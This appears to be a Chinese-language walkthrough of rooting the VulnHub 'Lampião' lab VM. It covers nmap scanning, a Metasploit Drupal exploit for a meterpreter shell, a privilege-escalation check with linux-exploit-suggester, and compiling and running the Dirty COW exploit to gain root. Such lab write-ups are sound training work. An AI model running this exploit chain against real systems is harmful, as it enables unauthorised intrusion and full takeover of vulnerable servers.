準備工作
在vulnhub官網下載lampiao靶機Lampião: 1 ~ VulnHub
匯入到vmware,設定成NAT模式
開啟kali準備進行滲透(ip:192.168.200.6)
資訊收集
利用nmap進行ip埠探測
nmap -sS 192.168.200.6/24
探測到ip為192.168.200.18的靶機,開放了80埠和22埠
再用nmap對所有埠進行探測,確保沒有別的遺漏資訊
nmap -sV -p- 192.168.200.18
還有一個1898埠也是http服務
80埠什麼都沒有
1898埠有一個登陸介面, CMS是Drupal的,搜一下關於Drupal的漏洞
msfconsole
使用msf利用漏洞
選擇第四個漏洞進行利用
use 4
set RHOSTS 192.168.200.18
set RPORT 1898
run
成功返回一個meterpreter會話
接下來我利用了linux-exploit-suggester.sh指令碼去探測漏洞,下載地址mzet-/linux-exploit-suggester: Linux privilege escalation auditing tool (github.com)
先下載到kali,然後在upload上傳到靶機的/tmp/資料夾中
upload /root/桌面/linux-exploit-suggester-master/linux-exploit-suggester.sh /tmp/1.sh
接著輸入shell進入終端,進入/tem/資料夾執行指令碼,但執行的時候說沒有許可權
用chmod +x 1.sh賦予執行許可權 在./1.sh執行
其中顯示有黃顏色的表示存在漏洞的可能性比較大,這裡省去測試環節,直接跳到dirty cow髒牛漏洞
dirty cow
這裡直接給了漏洞exp,是一個cpp檔案,但是直接下載到靶機沒有cpp字尾,只能先下載到kali在上傳上去。https://www.exploit-db.com/download/40847
先退出終端再上傳,再shell返回終端,進入tmp資料夾
upload /root/下載/40847.cpp /tmp/40847.cpp
編譯執行(網上漏洞利用的過程)
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o 40847 40847.cpp -lutil
./40847
獲得了root的密碼,先使用python 通過pty.spawn()獲得互動式shell
python -c'import pty;pty.spawn("/bin/bash")'
再切換root使用者
拿到flag